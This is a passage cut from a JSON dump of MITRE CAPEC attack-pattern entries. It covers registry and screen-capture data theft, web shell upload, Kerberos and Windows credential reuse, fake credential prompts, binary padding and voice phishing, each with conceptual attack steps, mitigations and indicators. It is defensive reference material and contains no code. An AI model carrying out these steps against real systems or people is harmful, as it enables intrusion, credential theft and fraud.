allowlist."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1120","Entry_Name":"Peripheral Device Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required"}]}},"647":{"ID":"647","Name":"Collect Data from Registries","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Gain logical access to system] An adversary must first gain logical access to the system it wants to gather registry information from,","Technique":["Obtain user account credentials and access the system","Plant malware on the system that will give remote logical access to the adversary"]},{"Step":"2","Phase":"Experiment","Description":"[Determine if the permissions are correct] Once logical access is gained, an adversary will determine if they have the proper permissions, or are authorized, to view registry information. If they do not, they will need to escalate privileges on the system through other means"},{"Step":"3","Phase":"Experiment","Description":"[Peruse registry for information] Once an adversary has access to a registry, they will gather all system-specific data and sensitive information that they deem useful."},{"Step":"4","Phase":"Exploit","Description":"[Follow-up attack] Use any information or weaknesses found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":["The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).","The adversary must have capability to navigate the operating system to peruse the registry."]},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to read sensitive information about the system in the registry."}},"Mitigations":{"Mitigation":["Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.","Employ robust identification and audit/blocking via using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"285"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.002","Entry_Name":"Unsecured Credentials:Credentials in Registry"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1005","Entry_Name":"Data from Local System"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-15"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"648":{"ID":"648","Name":"Collect Data from Screen Capture","Abstraction":"Detailed","Status":"Draft","Description":"An adversary gathers sensitive information by exploiting the system\'s screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)."},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to capture potentially sensitive information and processes as they appear on the screen."}},"Mitigations":{"Mitigation":["Identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using allowlist tools.","While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1113","Entry_Name":"Screen Capture"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"}]}},"649":{"ID":"649","Name":"Adding a Space to a File Extension","Abstraction":"Detailed","Status":"Draft","Description":"An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"635"}},"Prerequisites":{"Prerequisite":"The use of the file must be controlled by the file extension."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"File extensions should be checked to see if non-visible characters are being included."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"46"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1036.006","Entry_Name":"Masquerading:Space after Filename"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"650":{"ID":"650","Name":"Upload a Web Shell to a Web Server","Abstraction":"Detailed","Status":"Draft","Description":"By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a \\"gateway\\" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":"The web server is susceptible to one of the various web application exploits that allows for uploading a shell file."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Make sure your web server is up-to-date with all patches to protect against known vulnerabilities.","Ensure that the file permissions in directories on the web server from which files can be execute is set to the \\"least privilege\\" settings, and that those directories contents is controlled by an allowlist."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"553"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1505.003","Entry_Name":"Server Software Component:Web Shell"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"651":{"ID":"651","Name":"Eavesdropping","Abstraction":"Standard","Status":"Draft","Description":"An adversary intercepts a form of communication (e.g. text, audio, video) by way of software (e.g., microphone and audio recording application), hardware (e.g., recording equipment), or physical means (e.g., physical proximity). The goal of eavesdropping is typically to gain unauthorized access to sensitive information about the target for financial, personal, political, or other gains. Eavesdropping is different from a sniffing attack as it does not take place on a network-based communication channel (e.g., IP traffic). Instead, it entails listening in on the raw audio source of a conversation between two or more parties.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"117"}},"Prerequisites":{"Prerequisite":"The adversary typically requires physical proximity to the target\'s environment, whether for physical eavesdropping or for placing recording equipment. This is not always the case for software-based eavesdropping, if the adversary has the capability to install malware on the target system that can activate a microphone and record audio digitally."},"Resources_Required":{"Resource":"For logical eavesdropping, some equipment may be necessary (e.g., microphone, tape recorder, etc.). For physical eavesdropping, only proximity is required."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"The adversary gains unauthorized access to information."}},"Mitigations":{"Mitigation":["Be mindful of your surroundings when discussing sensitive information in public areas.","Implement proper software restriction policies to only allow authorized software on your environment. Use of anti-virus and other security monitoring and detecting tools can aid in this too. Closely monitor installed software for unusual behavior or activity, and implement patches as soon as they become available.","If possible, physically disable the microphone on your machine if it is not needed."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"652":{"ID":"652","Name":"Use of Known Kerberos Credentials","Abstraction":"Standard","Status":"Draft","Description":"An adversary obtains (i.e. steals or purchases) legitimate Kerberos credentials (e.g. Kerberos service account userID/password or Kerberos Tickets) with the goal of achieving authenticated access to additional systems, applications, or services within the domain. Kerberos is the default authentication method for Windows domains and is utilized for numerous authentication purposes. Attacks leveraging trusted Kerberos credentials can result in numerous consequences, depending on what Kerberos credential is stolen. For example, Kerberos service accounts are typically used to run services or scheduled tasks pertaining to authentication. However, these credentials are often weak and never expire, in addition to possessing local or domain administrator privileges. If an adversary is able to acquire these credentials, it could result in lateral movement within the Windows domain or access to any resources the service account is privileged to access, among other things. Kerberos credentials can be obtained by an adversary via methods such as system breaches, network sniffing attacks, and/or brute force attacks against the Kerberos service account or the hash of a service ticket. Ultimately, successful spoofing and impersonation of trusted Kerberos credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Kerberos credentials] The adversary must obtain known Kerberos credentials in order to access the target system, application, or service within the domain.","Technique":["An adversary purchases breached Kerberos service account username/password combinations or leaked hashed passwords from the dark web.","An adversary guesses the credentials to a weak Kerberos service account.","An adversary conducts a sniffing attack to steal Kerberos tickets as they are transmitted.","An adversary conducts a Kerberoasting attack."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt Kerberos authentication] Try each Kerberos credential against various resources within the domain until the target grants access.","Technique":["Manually or automatically enter each Kerberos service account credential through the target\'s interface.","Attempt a Pass the Ticket attack."]},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain and leverages Kerberos authentication.","The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication for Kerberos service accounts.","The system/application does not have a sound password policy that is being enforced for Kerberos service accounts.","The system/application does not implement an effective password throttling mechanism for authenticating to Kerberos service accounts.","The targeted network allows for network sniffing attacks to succeed."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Kerberos credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A valid Kerberos ticket or a known Kerberos service account credential."},"Indicators":{"Indicator":["Authentication attempts use expired or invalid credentials.","Authentication attempts are originating from IP addresses or locations that are inconsistent with an account\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy for Kerberos service accounts.","Ensure Kerberos service accounts are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse Kerberos service account credentials across systems.","Deny remote use of Kerberos service account credentials to log into domain systems.","Do not allow Kerberos service accounts to be a local administrator on more than one system.","Enable at least AES Kerberos encryption for tickets.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]","PowerSploit\'s Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"294"},{"CWE_ID":"836"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1558","Entry_Name":"Steal or Forge Kerberos Tickets"}},"References":{"Reference":[{"External_Reference_ID":"REF-584"},{"External_Reference_ID":"REF-585"},{"External_Reference_ID":"REF-586"}]},"Notes":{"Note":["Kerberos centers around a ticketing system that is used to request/grant access to resources and to then access the requested resources. If one of these tickets is acquired, an adversary could gain access to a specific resource; access any resource a user has privileges to access; gain access to services that use Kerberos as an authentication mechanism and generate tickets to access a particular resource and the system that hosts the resource; or generate Ticket Granting Tickets (TGTs) for any domain account within Active Directory.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Notes, Related_Attack_Patterns"}}},"653":{"ID":"653","Name":"Use of Known Windows Credentials","Abstraction":"Standard","Status":"Draft","Description":"An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows domain credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the domain, under the guise of an authenticated user or service. Attacks leveraging trusted Windows credentials typically result in the adversary laterally moving within the local Windows network, since users are often allowed to login to systems/applications within the domain using their Windows domain password. This domain authentication can occur directly (user typing in their password or PIN) or via Single Sign-On (SSO) or cloud-based authentication, which often don\'t verify the authenticity of the user\'s input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data. Utilizing known Windows credentials, an adversary can obtain sensitive data from administrator shares, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more. Ultimately, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"560","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows credentials] The adversary must obtain known Windows credentials in order to access the target system, application, or service within the domain.","Technique":["An adversary purchases breached Windows username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal Windows credentials as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows credential against various systems, applications, and services within the domain until the target grants access.","Technique":"Manually or automatically enter each credential through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known Windows user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A list of known Windows credentials for the targeted domain.","A custom script that leverages a Windows credential list to launch an attack."]},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with a user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]","Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"}]},"References":{"Reference":[{"External_Reference_ID":"REF-575"},{"External_Reference_ID":"REF-576"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"654":{"ID":"654","Name":"Credential Prompt Impersonation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary, through a previously installed malicious application, impersonates a credential prompt in an attempt to steal a user\'s credentials. The adversary may monitor the task list maintained by the operating system and wait for a specific legitimate credential prompt to become active. Once the prompt is detected, the adversary launches a new credential prompt in the foreground that mimics the user interface of the legitimate credential prompt. At this point, the user thinks that they are interacting with the legitimate credential prompt, but instead they are interacting with the malicious credential prompt. A second approach involves the adversary impersonating an unexpected credential prompt, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process or commonly used application (e.g., email reader) requires authentication for some purpose. The user, believing they are interacting with a legitimate credential prompt, enters their credentials which the adversary then leverages for nefarious purposes. The ultimate goal of this attack is to obtain sensitive information (e.g., credentials) from the user.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"504"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine suitable tasks to exploit] Determine what tasks exist on the target system that may result in a user providing their credentials.","Technique":"Determine what tasks prompt a user for their credentials."},{"Step":"2","Phase":"Exploit","Description":"[Impersonate Task] Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials.","Technique":"Prompt a user for their credentials, while making the user believe the credential request is legitimate."}]},"Prerequisites":{"Prerequisite":["The adversary must already have access to the target system via some means.","A legitimate task must exist that an adversary can impersonate to glean credentials."]},"Skills_Required":{"Skill":["Once an adversary has gained access to the target system, impersonating a credential prompt is not difficult.",{"Level":"Low"}]},"Resources_Required":{"Resource":["Malware or some other means to initially comprise the target system.","Additional malware to impersonate a legitimate credential prompt."]},"Indicators":{"Indicator":"Credential prompts that appear illegitimate or unexpected."},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help."},"Example_Instances":{"Example":["An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user\'s Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user\'s encrypted email.","An adversary randomly prompts a user to enter their system credentials, tricking the user into believing that a background process requires the credentials to function. The adversary can then use these gleaned credentials to execute additional attacks or obtain data."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1021"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"}}},"655":{"ID":"655","Name":"Avoid Security Tool Identification by Adding Data","Abstraction":"Detailed","Status":"Draft","Description":{"p":["An adversary adds data to a file to increase the file size beyond what security tools are capable of handling in an attempt to mask their actions.","In addition to this, adding data to a file also changes the file\'s hash, frustrating security tools that look for known bad files by their hash."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"572"}},"Consequences":{"Consequence":[{"Scope":"Accountability","Impact":["Hide Activities","Bypass Protection Mechanism"]},{"Scope":"Integrity","Impact":"Modify Data"}]},"Example_Instances":{"Example":{"p":"Adding data to change the checksum of a file and can be used to avoid hash-based denylists and static anti-virus signatures."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1027.001","Entry_Name":"Obfuscated Files or Information:Binary padding"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances"}}},"656":{"ID":"656","Name":"Voice Phishing","Abstraction":"Detailed","Status":"Stable","Description":"An adversary targets users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Voice Phishing is a variation of the Phishing social engineering technique where the attack is initiated via a voice call, rather than email. The user is enticed to provide sensitive information by the adversary, who masquerades as a legitimate employee of the alleged organization. Voice Phishing attacks deviate from standard Phishing attacks, in that a user doesn\'t typically interact with a compromised website to provide sensitive information and instead provides this information verbally. Voice Phishing attacks can also be initiated by either the adversary in the form of a \\"cold call\\" or by the victim if calling an illegitimate telephone number.","Alternate_Terms":{"Alternate_Term":[{"Term":"Vishing"},{"Term":"VoIP Phishing"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"98"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain domain name and certificate to spoof legitimate site] This optional step can be used to help the adversary impersonate the legitimate organization more convincingly. The adversary can use homograph or similar attacks to convince users that they are using the legitimate website. If the adversary leverages cold-calling for this attack, this step is skipped.","Technique":["Optionally obtain a domain name that visually looks similar to the legitimate organization\'s domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L)","Optionally obtain a legitimate SSL certificate for the new domain name."]},{"Step":"2","Phase":"Explore","Description":"[Explore legitimate website and create duplicate] An adversary optionally creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the organization\'s website that they are trying to impersonate. That website will contain a telephone number for the victim to call to assist them with their issue and initiate the attack. If the adversary leverages cold-calling for this attack, this step is skipped.","Technique":["Use spidering software to get copy of web pages on legitimate site.","Manually save copies of required web pages from legitimate site.","Create new web pages that have the legitimate site\'s look and feel, but contain completely new content."]},{"Step":"3","Phase":"Exploit","Description":"[Convince user to provide sensitive information to the adversary.] An adversary \\"cold calls\\" the victim or receives a call from the victim via the malicious site and provides a call-to-action, in order to persuade the user into providing sensitive details to the adversary (e.g. login credentials, bank account information, etc.). The key is to get the victim to believe that the individual they are talking to is from a legitimate entity with which the victim does business and that the call is occurring for legitimate reasons. A call-to-action will usually need to sound legitimate and urgent enough to prompt action from the user.","Technique":"Call the user a from a spoofed legitimate-looking telephone number."},{"Step":"4","Phase":"Exploit","Description":"[Use stolen information] Once the adversary obtains the sensitive information, this information can be leveraged to log into the victim\'s bank account and transfer money to an account of their choice, or to make fraudulent purchases with stolen credit card information.","Technique":"Login to the legitimate site using another the victim\'s supplied credentials"}]},"Prerequisites":{"Prerequisite":["An adversary needs phone numbers to initiate contact with the victim, in addition to a legitimate-looking telephone number to call the victim from.","An adversary needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their \\"hooks\\" to many potential victims.","An adversary needs to have a sufficiently compelling call to action to prompt the user to take action.","If passively conducting this attack via a spoofed website, replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Legitimate-looking telephone number(s) to initiate calls with victims"},"Indicators":{"Indicator":["You receive a call from an entity that you are not even a customer of prompting you to log into your account.","You receive any call that requests you provide sensitive information.","You are redirected to a website that instructs you to call the number on-screen to address the call-to-action."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem."},"Example_Instances":{"Example":["The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.","An adversary calls the target and claims to work for their bank. The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim\'s account to an account controlled by the 